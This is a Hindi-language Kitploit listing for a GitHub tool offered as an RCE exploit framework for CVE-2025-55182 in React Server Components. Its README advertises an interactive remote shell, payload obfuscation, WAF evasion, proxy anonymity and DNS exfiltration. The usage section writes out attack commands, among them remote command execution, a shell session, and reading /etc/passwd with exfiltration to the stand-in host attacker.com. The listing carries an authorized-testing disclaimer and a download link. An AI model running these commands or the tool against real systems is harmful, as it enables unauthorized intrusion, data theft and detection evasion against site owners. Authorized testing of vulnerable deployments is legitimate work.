Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit — CVE-2025-55182 के लिए उन्नत React Server Components RCE स्कैनर। विशेषताएँ: बहु-चरणीय फ़िंगरप्रिंटिंग, भेद्यता सत्यापन, DNS एक्सफ़िल्ट्रेशन, इंटरैक्टिव शेल, पेलोड ऑब्फ़स्केशन, और पेशेवर रिपोर्टिंग (JSON/HTML/PDF)। केवल अधिकृत परीक्षण। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनWAF बाईपासपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubcerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit

CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

CVE-2025-55182 के लिए उन्नत React Server Components RCE स्कैनर। विशेषताएँ: बहु-चरणीय फ़िंगरप्रिंटिंग, भेद्यता सत्यापन, DNS एक्सफ़िल्ट्रेशन, इंटरैक्टिव शेल, पेलोड ऑब्फ़स्केशन, और पेशेवर रिपोर्टिंग (JSON/HTML/PDF)। केवल अधिकृत परीक्षण।

रिपॉजिटरी देखें
1342 महीने पहलेअभी तक समीक्षित नहीं

🔐 ReactRCE-Scanner

CVE-2025-55182 — उन्नत React Server Components RCE एक्सप्लॉइट और मूल्यांकन फ्रेमवर्क

Version CVE CVSS Python License

Author PRs Welcome Downloads


📑 विषय-सूची

  • कानूनी अस्वीकरण और नैतिक सूचना

  • अवलोकन

  • मुख्य क्षमताएँ

  • त्वरित प्रारंभ मार्गदर्शिका

  • आर्किटेक्चर और विशेषताओं की गहन जानकारी

  • कॉन्फ़िगरेशन संदर्भ

  • स्वचालित परीक्षण सूट

  • उपचार और शमन

  • योगदान और समुदाय

  • संदर्भ

  • लाइसेंस और लेखक


⚠️ कानूनी अस्वीकरण और नैतिक सूचना

यह टूल विशेष रूप से शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए बनाया गया है। पूर्व लिखित सहमति के बिना लक्ष्यों के विरुद्ध इस सॉफ़्टवेयर का अनधिकृत उपयोग अंतर्राष्ट्रीय कंप्यूटर अपराध कानूनों का उल्लंघन है, जिसमें Computer Fraud and Abuse Act (CFAA), GDPR प्रावधान, और मानक सेवा शर्तें समझौते शामिल हैं। लेखक और योगदानकर्ता इस कार्यक्रम से उत्पन्न किसी भी दुरुपयोग, अवैध संचालन, या परिणामी क्षति के लिए सभी दायित्वों से इनकार करते हैं।पूर्णतः अपने जोखिम पर आगे बढ़ें।


📋 अवलोकन

ReactRCE-Scanner एक एंटरप्राइज़-ग्रेड सुरक्षा मूल्यांकन और सत्यापन फ्रेमवर्क है, जिसे विशेष रूप से CVE-2025-55182 [1] के लिए डिज़ाइन किया गया है, जो एक गंभीर Remote Code Execution (RCE) भेद्यता है जो React Server Components को संस्करण 19.0.0 से 19.2.0 तक प्रभावित करती है।

यह फ्रेमवर्क सैद्धांतिक भेद्यता अनुसंधान और व्यावहारिक सुरक्षा सत्यापन के बीच की खाई को पाटता है। बहु-चरणीय फिंगरप्रिंटिंग, कठोर गलत-सकारात्मक कमी, उन्नत पेलोड ऑब्फस्केशन, और स्वचालित बहु-प्रारूप रिपोर्टिंग को शामिल करके, यह सुरक्षा इंजीनियरों को सटीक नैदानिक क्षमताएँ प्रदान करता है।

उपयोगस्कैन परिणाम

🎯 मुख्य क्षमताएँ

विशेषता श्रेणीकार्यान्वयन विशेषतापरिचालन स्थिति
स्मार्ट फिंगरप्रिंटिंगविश्वास स्कोरिंग एल्गोरिदम के साथ बहु-स्रोत फ्रेमवर्क और संस्करण पहचान।✅
बहु-चरणीय सत्यापनगलत सकारात्मक को व्यवस्थित रूप से समाप्त करने के लिए डिज़ाइन की गई 5-चरणीय सत्यापन पाइपलाइन।✅
पेलोड जनरेशनDNS एक्सफ़िल्ट्रेशन और बहु-एन्कोडिंग का समर्थन करने वाला ऑब्फस्केटेड पेलोड बिल्डर।✅
इंटरैक्टिव शेलसत्यापित लक्ष्यों पर रीयल-टाइम छद्म-इंटरैक्टिव कमांड निष्पादन और शेल एक्सेस।✅
व्यापक रिपोर्टिंगJSON, HTML, PDF, और Markdown प्रारूपों में स्वचालित रिपोर्ट जनरेशन।✅
DNS एक्सफ़िल्ट्रेशनसुरक्षित DNS क्वेरी हैंडलिंग के माध्यम से आउट-ऑफ-बैंड कमांड आउटपुट एक्सफ़िल्ट्रेशन।✅
कंकरेंसी इंजनबड़े अटैक सरफेस के लिए उच्च-प्रदर्शन मल्टी-थ्रेडेड स्कैनिंग आर्किटेक्चर।✅
प्रॉक्सी एकीकरणअनाम मूल्यांकन ट्रैफ़िक के लिए HTTP/HTTPS और SOCKS प्रॉक्सी समर्थन।✅

🚀 त्वरित प्रारंभ मार्गदर्शिका

इंस्टॉलेशन

रिपॉज़िटरी को क्लोन करें और स्वचालित सेटअप स्क्रिप्ट या मैन्युअल निर्भरता इंस्टॉलेशन का उपयोग करके वातावरण को प्रारंभ करें:

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh

# Alternatively, install core Python dependencies manually
pip install -r requirements.txt

बुनियादी कमांड संदर्भ

यह फ्रेमवर्क एक मॉड्यूलर CLI आर्किटेक्चर के माध्यम से संचालित होता है जो एकल-लक्ष्य सत्यापन, फ़ाइल सूचियों से बल्क स्कैनिंग, इंटरैक्टिव शेल स्पॉनिंग, और अनुपालन रिपोर्टिंग का समर्थन करता है।

# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan

# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json

# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"

# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell

# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com

# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf

🔬 आर्किटेक्चर और विशेषताओं की गहन जानकारी

1. स्मार्ट फिंगरप्रिंटिंग इंजन

यह फ्रेमवर्क पेलोड डिलीवरी से पहले गहन टोह लेता है। यह कई HTTP हेडर फ़ील्ड (X-Powered-By, Next-Action, RSC), HTML संरचनात्मक मेटा टैग (data-reactroot, __NEXT_DATA__), स्थिर बिल्ड एसेट्स, और JavaScript स्रोत बंडलों [2] [3] का विश्लेषण करता है।

विश्वास स्कोर चार श्रेणियों में वर्गीकृत हैं:

  • CRITICAL (95%+): कई स्वतंत्र संकेतक भेद्य React Server Component रनटाइम संस्करणों की पुष्टि करते हैं।

  • HIGH (75–95%): सटीक संस्करण मिलान के साथ मजबूत संरचनात्मक संकेतक पहचाने गए।

  • MEDIUM (50–75%): आंशिक फ्रेमवर्क मार्कर मौजूद; मैन्युअल सत्यापन आवश्यक।

  • LOW (<50%): कमजोर ह्यूरिस्टिक्स का पता चला; गलत सकारात्मक की उच्च संभावना।

2. बहु-चरणीय सत्यापन वर्कफ़्लो

परिचालन अखंडता बनाए रखने और अनपेक्षित सेवा व्यवधानों को रोकने के लिए, किसी भी शोषण चरण को अनलॉक करने से पहले पेलोड एक कठोर सत्यापन पाइपलाइन से गुज़रते हैं।

Target URL / Endpoint
       │
       ▼
[Stage 1] Framework & Header Detection
       │
       ▼
[Stage 2] Component Version Analysis
       │
       ▼
[Stage 3] Protocol Compatibility Check
       │
       ▼
[Stage 4] Non-Destructive Safe Validation Request
       │
       ▼
[Stage 5] Statistical Confidence Scoring
       │
       ▼
Vulnerability Assessment Decision

3. पेलोड ऑब्फस्केशन और एवेज़न

रक्षात्मक नियंत्रणों और Web Application Firewalls (WAFs) का परीक्षण करने के लिए, यह फ्रेमवर्क एक उन्नत पेलोड जनरेटर एम्बेड करता है जो समर्थन करता है:

  • एन्कोडिंग स्कीम: Base64, Hexadecimal, और Octal रूपांतरण।
टूल डाउनलोड करें